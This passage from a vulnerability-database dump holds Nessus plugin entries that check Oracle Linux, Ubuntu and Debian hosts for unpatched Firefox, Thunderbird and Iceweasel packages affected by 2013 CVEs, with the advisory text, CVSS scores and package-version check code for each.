After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.", "edition": 18, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : firefox (ELSA-2013-0981)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:xulrunner", "p-cpe:/a:oracle:linux:firefox", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:xulrunner-devel"], "id": "ORACLELINUX_ELSA-2013-0981.NASL", "href": "https://www.tenable.com/plugins/nessus/68839", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0981 and \n# Oracle Linux Security Advisory ELSA-2013-0981 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68839);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"RHSA\", value:\"2013:0981\");\n\n script_name(english:\"Oracle Linux 5 / 6 : firefox (ELSA-2013-0981)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2013:0981 :\n\nUpdated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 
6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. 
You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-June/003548.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-June/003549.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"firefox-17.0.7-1.0.1.el5_9\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"EL5\", reference:\"xulrunner-17.0.7-1.0.1.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"xulrunner-devel-17.0.7-1.0.1.el5_9\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"firefox-17.0.7-1.0.1.el6_4\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xulrunner-17.0.7-1.0.1.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xulrunner-devel-17.0.7-1.0.1.el6_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / xulrunner / xulrunner-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:59", "description": "From Red Hat Security Advisory 2013:0982 :\n\nAn updated thunderbird package that fixes several security issues is\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content.\nMalicious content could cause Thunderbird to crash or, potentially,\nexecute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files\ncould allow an attacker to read data across domains, potentially\nleading to information disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. 
They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.", "edition": 18, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : thunderbird (ELSA-2013-0982)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:thunderbird"], "id": "ORACLELINUX_ELSA-2013-0982.NASL", "href": "https://www.tenable.com/plugins/nessus/68840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0982 and \n# Oracle Linux Security Advisory ELSA-2013-0982 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68840);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"RHSA\", value:\"2013:0982\");\n\n script_name(english:\"Oracle Linux 6 : thunderbird (ELSA-2013-0982)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n 
value:\n\"From Red Hat Security Advisory 2013:0982 :\n\nAn updated thunderbird package that fixes several security issues is\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content.\nMalicious content could cause Thunderbird to crash or, potentially,\nexecute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files\ncould allow an attacker to read data across domains, potentially\nleading to information disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. 
They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-June/003547.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"thunderbird-17.0.7-1.0.1.el6_4\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:22:32", "description": "Multiple memory safety issues were discovered in Thunderbird. 
If the\nuser were tricked into opening a specially crafted message with\nscripting enabled, an attacker could possibly exploit these to cause a\ndenial of service via application crash, or potentially execute\narbitrary code with the privileges of the user invoking Thunderbird.\n(CVE-2013-1682)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user\nwere tricked into opening a specially crafted message with scripting\nenabled, an attacker could possibly exploit these to execute arbitrary\ncode with the privileges of the user invoking Thunderbird.\n(CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope\nof an element could be made to bypass System Only Wrappers (SOW). If a\nuser had scripting enabled, an attacker could potentially exploit this\nto execute arbitrary code with the privileges of the user invoking\nThunderbird. (CVE-2013-1687)\n\nA crash was discovered when reloading a page that contained content\nusing the onreadystatechange event. If a user had scripting enabled,\nan attacker could potentially exploit this to execute arbitrary code\nwith the privileges of the user invoking Thunderbird. (CVE-2013-1690)\n\nJohnathan Kuskos discovered that Thunderbird sent data in the body of\nXMLHttpRequest HEAD requests. If a user had scripting enabled, an\nattacker could exploit this to conduct Cross-Site Request Forgery\n(CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images\nwith filters. If a user had scripting enabled, an attacker could\nexploit this to view sensitive information. (CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. If a user had\nscripting enabled, an attacker could potentially exploit this to cause\na denial of service via application crash, or execute code with the\nprivileges of the user invoking Thunderbird. 
(CVE-2013-1694)\n\nIt was discovered that XrayWrappers could be bypassed to call\ncontent-defined methods in certain circumstances. If a user had\nscripting enabled, an attacker could exploit this to cause undefined\nbehaviour. (CVE-2013-1697).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-06-27T00:00:00", "title": "Ubuntu 12.04 LTS / 12.10 / 13.04 : thunderbird vulnerabilities (USN-1891-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:13.04", "p-cpe:/a:canonical:ubuntu_linux:thunderbird", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1891-1.NASL", "href": "https://www.tenable.com/plugins/nessus/67001", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1891-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67001);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"USN\", value:\"1891-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 12.10 / 13.04 : thunderbird vulnerabilities (USN-1891-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple memory safety issues were discovered in Thunderbird. If the\nuser were tricked into opening a specially crafted message with\nscripting enabled, an attacker could possibly exploit these to cause a\ndenial of service via application crash, or potentially execute\narbitrary code with the privileges of the user invoking Thunderbird.\n(CVE-2013-1682)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user\nwere tricked into opening a specially crafted message with scripting\nenabled, an attacker could possibly exploit these to execute arbitrary\ncode with the privileges of the user invoking Thunderbird.\n(CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope\nof an element could be made to bypass System Only Wrappers (SOW). If a\nuser had scripting enabled, an attacker could potentially exploit this\nto execute arbitrary code with the privileges of the user invoking\nThunderbird. (CVE-2013-1687)\n\nA crash was discovered when reloading a page that contained content\nusing the onreadystatechange event. 
If a user had scripting enabled,\nan attacker could potentially exploit this to execute arbitrary code\nwith the privileges of the user invoking Thunderbird. (CVE-2013-1690)\n\nJohnathan Kuskos discovered that Thunderbird sent data in the body of\nXMLHttpRequest HEAD requests. If a user had scripting enabled, an\nattacker could exploit this to conduct Cross-Site Request Forgery\n(CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images\nwith filters. If a user had scripting enabled, an attacker could\nexploit this to view sensitive information. (CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. If a user had\nscripting enabled, an attacker could potentially exploit this to cause\na denial of service via application crash, or execute code with the\nprivileges of the user invoking Thunderbird. (CVE-2013-1694)\n\nIt was discovered that XrayWrappers could be bypassed to call\ncontent-defined methods in certain circumstances. If a user had\nscripting enabled, an attacker could exploit this to cause undefined\nbehaviour. (CVE-2013-1697).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1891-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|12\\.10|13\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 12.10 / 13.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"thunderbird\", pkgver:\"17.0.7+build1-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"thunderbird\", pkgver:\"17.0.7+build1-0ubuntu0.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"13.04\", pkgname:\"thunderbird\", pkgver:\"17.0.7+build1-0ubuntu0.13.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:55", "description": "Multiple security issues have been found in Iceweasel, Debian's\nversion of the Mozilla Firefox web browser: Multiple memory safety\nerrors, use-after-free vulnerabilities, missing permission checks,\nincorrect memory handling and other 
implementation errors may lead to\nthe execution of arbitrary code, privilege escalation, information\ndisclosure or cross-site request forgery.\n\nThe Iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.", "edition": 16, "published": "2013-06-29T00:00:00", "title": "Debian DSA-2716-1 : iceweasel - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-06-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:iceweasel", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2716.NASL", "href": "https://www.tenable.com/plugins/nessus/67101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2716. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67101);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"DSA\", value:\"2716\");\n\n script_name(english:\"Debian DSA-2716-1 : iceweasel - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Iceweasel, Debian's\nversion of the Mozilla Firefox web browser: Multiple memory safety\nerrors, use-after-free vulnerabilities, missing permission checks,\nincorrect memory handling and other 